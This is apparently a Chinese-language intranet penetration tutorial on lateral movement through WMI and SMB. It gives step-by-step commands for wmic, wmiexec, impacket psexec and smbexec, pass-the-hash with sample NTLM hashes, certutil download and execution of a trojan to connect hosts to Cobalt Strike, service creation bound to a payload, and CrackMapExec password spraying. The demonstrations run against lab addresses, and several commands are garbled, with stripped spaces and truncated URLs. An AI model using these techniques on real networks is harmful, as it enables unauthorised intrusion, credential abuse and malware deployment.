什么是WMI？WMI利用手法介紹

WMI

什么是WMI？

WMI是通過135端口進(jìn)行利用，支持用戶名明文或hash的方式進(jìn)行認(rèn)證，在使用WMIC執(zhí)行命令過程中，操作系統(tǒng)默認(rèn)不會(huì)將WMIC的操作記錄在日志中，因此在利用過程中不會(huì)產(chǎn)生日志。所以越來越多的攻擊者開始漸漸使用WMI進(jìn)行攻擊。

WMI的利用條件

1.獲得目標(biāo)機(jī)器的用戶名和密碼

2.開放139、445端口

WMIC的使用需要對(duì)方開啟135端口（有的工具需要445端口）和admin$共享，135端口是WMI默認(rèn)的管理端口

WMI利用手法

WMI演示環(huán)境如下圖：

WMIC

系統(tǒng)自帶的WMIC命令是單執(zhí)行，無回顯的，并且只支持明文密碼，不支持hash進(jìn)行傳遞 在這里，我們對(duì)SQLserver執(zhí)行了一個(gè)ipconfig的命令，并將結(jié)果保存在C盤的ip.txt文件中：

wmic/node:192.168.3.32/user:administrator/password:admin!@#45processcallcreate"cmd.exe/cipconfig>c:ip.txt

可以看到我們并無法直接看到命令的回顯，但我們上帝視角切到靶機(jī)發(fā)現(xiàn)確實(shí)是執(zhí)行命令了的 。

這里如果在實(shí)戰(zhàn)中，如果想要查看文件內(nèi)容和文件是否上傳成功的話，就要使用上篇文章內(nèi)網(wǎng)移動(dòng)-IPC中的type和dir命令

dir\192.168.3.32c$#列出該主機(jī)的C盤下的文件 type\192.168.3.32c$ip.txt

這里將其上線CS的步驟也是：使用下載命令讓其下載Web Server中的木馬，執(zhí)行上線

wmic/node:192.168.3.32/user:administrator/password:admin!@#45processcallcreate"cmd.exe/ccertutil-urlcache-split-f "#下載Webserver中的木馬文件到自己的C盤

wmic/node:192.168.3.32/user:administrator/password:admin!@#45processcallcreate"cmd.exe/cc:/4444.exe"#執(zhí)行木馬

可以看到此時(shí)sqlserver成功被上線。

wmiexec.vbs

wmiexec.vbs 腳本通過 VBS 調(diào)用 WMI 來模擬 PsExec 的功能，wmiexec.vbs 下載地址：https://github.com/k8gege/K8tools/blob/master/wmiexec.vbs，交互式，適合在反彈shell或msfconsole中使用，不適合CS控制 首先我們將其上傳到跳板機(jī)中，然后再使用命令去連接，由于CS無法返回shell的問題，所以該腳本并不適用于在CS中運(yùn)行，所以這里我選擇將會(huì)話轉(zhuǎn)移到MSF中去運(yùn)行。

cscript//nologowmiexec.vbs/shell192.168.3.32administratoradmin!@#45

可以看到在MSF中運(yùn)行了該文件后，成功將sqlserver的shell反彈了過來，在此我們可以直接讓其下載后門并執(zhí)行，上線到我們的CS中。

cmd.exe/ccertutil-urlcache-split-f

可以看到SQLserver成功上線CS

wmiexec-impacket

impacket套件中的wmiexec同樣可對(duì)WMI進(jìn)行橫向移動(dòng)，并且支持交互式與單執(zhí)行，支持hash進(jìn)行傳遞，相對(duì)來說更為方便，這里直接使用它的py腳本配合socket代理就可以對(duì)其內(nèi)網(wǎng)進(jìn)行橫向移動(dòng)，避免了上傳文件等敏感操作。首先設(shè)置好Socket代理，與proxifier的代理與代理規(guī)則

配置好socket代理與規(guī)則后，就可直接在本機(jī)中調(diào)用wmiexec.py文件對(duì)其內(nèi)網(wǎng)進(jìn)行wmi利用

pythonwmiexec.py./administrator:Admin12345@192.168.3.21#通過明文密碼連接獲得目標(biāo)本地用戶交互式shell pythonwmiexec.pygod/administrator:Admin12345@192.168.3.21#通過明文密碼連接獲得目標(biāo)域用戶交互式shell

通過該命令成功獲得一個(gè)交互式的shell，那么wmiexec.py也可單執(zhí)行命令。

pythonwmiexec.py./administrator:admin!@#45@192.168.3.32"whoami"#以明文密碼連接本地用戶并執(zhí)行命令

pythonwmiexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32"whoami"#以hash密碼連接本地用戶并執(zhí)行命令

這里將目標(biāo)上線CS的方式和上面一致，通過命令下載木馬并執(zhí)行。

pythonwmiexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32"cmd.exe/ccertutil-urlcache-split-f "

SMB

什么是SMB？

SMB（Server Message Block）服務(wù)器信息塊，它也是一種客戶端到服務(wù)器的通信協(xié)議。除此之外，SMB協(xié)議也被稱為請(qǐng)求-回復(fù)協(xié)議?？蛻舳伺c服務(wù)器建立連接后，客戶端可以向服務(wù)器發(fā)送SMB命令允許用戶訪問共享、打開、讀取或者是寫入文件

SMB的利用條件

1. 利用SMB服務(wù)可以通過明文或hash傳遞來遠(yuǎn)程執(zhí)行，條件445服務(wù)端口開放。

2.獲得該目標(biāo)的賬號(hào)名與密碼或hash

SMB利用手法

SMB演示環(huán)境如下圖：

PsExec

官方Psexec

Psexec 是由 Mark Russinovich 創(chuàng)建的 Sysinternals Suite中包含的工具。最初，它旨在作為系統(tǒng)管理員的便利工具，以便他們可以通過在遠(yuǎn)程主機(jī)上運(yùn)行命令來執(zhí)行維護(hù)任務(wù)。后來因?yàn)樘^方便，被利用到內(nèi)網(wǎng)滲透之中，但不支持hash傳遞，且CS無法利用，而且該工具好像只能在具有桌面權(quán)限后才可進(jìn)行利用，我這里使用msf和反彈shell都無法成功反彈shell.... 這里將psexec.64上傳到跳板機(jī)中

然后在跳板機(jī)桌面中運(yùn)行該工具，就會(huì)反彈出目標(biāo)機(jī)器的shell，如下圖所示

psexec64.exe\192.168.3.32-uadministrator-padmin!@#45-scmd

Impacket-PsExec

還有一個(gè)psexec就是我們的impacket套件中的工具，官方psexec有諸多限制，如不支持hash、cs、msf無法利用成功等問題，所以這里選擇使用impacket中的psexec工具就相對(duì)來說比較靈活，同樣，為了避免發(fā)送上傳文件時(shí)數(shù)據(jù)丟失或被查殺等問題，我們可使用socket+psexec.py對(duì)其內(nèi)網(wǎng)進(jìn)行橫向移動(dòng)。socket配置此處不再描述，這里直接使用impacket-Psexec.py進(jìn)行利用

psexec.py./administrator:admin!@#45@192.168.3.32#通過明文密碼連接獲得目標(biāo)本地用戶交互式shell psexec.pygod/administrator:Admin12345@192.168.3.21#通過明文密碼連接獲得目標(biāo)域用戶交互式shell

pythonpsexec.py-hashes:518b98ad4178a53695dc997aa02d455c./administrator@192.168.3.32#通過哈希密碼連接獲得目標(biāo)本地用戶交互式shell pythonpsexec.py-hashes:ccef208c6485269c20db2cad21734fe7god/administrator@192.168.3.21#通過哈希密碼連接獲得目標(biāo)域用戶交互式shell

CS插件-psexec

在我們的CS中其實(shí)也有PSEXEC利用功能，且利用較為方便與簡(jiǎn)單，在targets中選中目標(biāo)右鍵即可彈出利用選項(xiàng)，且支持hash的移動(dòng)

點(diǎn)擊psexec64后，就會(huì)讓我們選擇用戶名密碼與所登錄域等，這里我們直接選擇之前我們?cè)谔鍣C(jī)中所收集的密碼，Domain置空的話為本地用戶登錄，輸入域名后則為域用戶登錄，選擇監(jiān)聽器和會(huì)話之后，點(diǎn)擊Launch即可。

這里看到Sqlserver成功上線，這里如果想以域用戶的身份登錄時(shí)，Domain處輸入域名即為域用戶身份登錄。

較為簡(jiǎn)單，這里不做過多講解。

smbexec-impacket

在impacket中smbexec工具也可以進(jìn)行移動(dòng)，該工具利用方式和psexec利用方式相同，這里簡(jiǎn)單介紹一下即可

pythonsmbexec.py./administrator:admin!@#45@192.168.3.32#通過明文密碼連接獲得目標(biāo)本地用戶交互式shell pythonsmbexec.py-hashes:ccef208c6485269c20db2cad21734fe7god/administrator@192.168.3.21#通過哈希密碼連接獲得目標(biāo)域用戶交互式shell

Services

同時(shí)還有一個(gè)系統(tǒng)自帶的服務(wù)也可進(jìn)行利用，該服務(wù)支持哈希密碼傳遞，且為單執(zhí)行無回顯，無法交互shell。具體利用過程如下：首先建立SMB連接后，創(chuàng)建一個(gè)服務(wù)，服務(wù)綁定木馬，然后在啟動(dòng)該服務(wù)，即可上線到CS中

services-hashes:518b98ad4178a53695dc997aa02d455c./administrator:@192.168.3.32create-nameshell-displayshellexec-pathC:4444.exe#建立SMB連接并創(chuàng)建服務(wù)綁定木馬 services-hashes:518b98ad4178a53695dc997aa02d455c./administrator:@192.168.3.32start-nameshell#啟動(dòng)shell服務(wù)

CrackMapExec

在內(nèi)網(wǎng)滲透中，能獲取到主機(jī)管理員賬號(hào)密碼，將會(huì)使我們橫向事半功倍，尤其是在大內(nèi)網(wǎng)環(huán)境中，密碼復(fù)用率很高，一波噴灑，能助力你拿到一波主機(jī)，對(duì)拿到的主機(jī)再次抓取密碼，再用新拿到的密碼噴灑一波......，如此反復(fù)。密碼噴灑的思路就是這樣：不斷收集內(nèi)網(wǎng)賬號(hào)密碼，不斷去噴灑。這時(shí)我們就需要類似CrackMapExec這樣的密碼噴灑工具，對(duì)其內(nèi)網(wǎng)進(jìn)行密碼噴灑。CrackMap同樣的，CrackMapExec支持本地、域內(nèi)和明文密文的fuzz，具體利用命令如下：域用戶明文密碼噴灑：

proxychainscrackmapexecsmb192.168.3.21-32-udbadmin-p'Admin12345'

本地用戶明文密碼噴灑：

proxychainscrackmapexecsmb192.168.3.21-32-uadministrator-p'admin!@#45'--local-auth

域內(nèi)用戶hash密碼噴灑

proxychainscrackmapexecsmb192.168.3.32-udbadmin-H'518b98ad4178a53695dc997aa02d455c'

本地用戶hash密碼噴灑

proxychainscrackmapexecsmb192.168.3.32-uadministrator-H'518b98ad4178a53695dc997aa02d455c'--local-auth

執(zhí)行命令也是非常的簡(jiǎn)單，這里直接在上面命令后加上-x 'bash' 即可

proxychainscrackmapexecsmb192.168.3.32-uadministrator-H'518b98ad4178a53695dc997aa02d455c'--local-auth-x'whoami'

當(dāng)然這里也可以通過已經(jīng)噴灑出的主機(jī)和密碼配合CS中的psexec上線到CS中。此處就不再演示。

審核編輯：劉清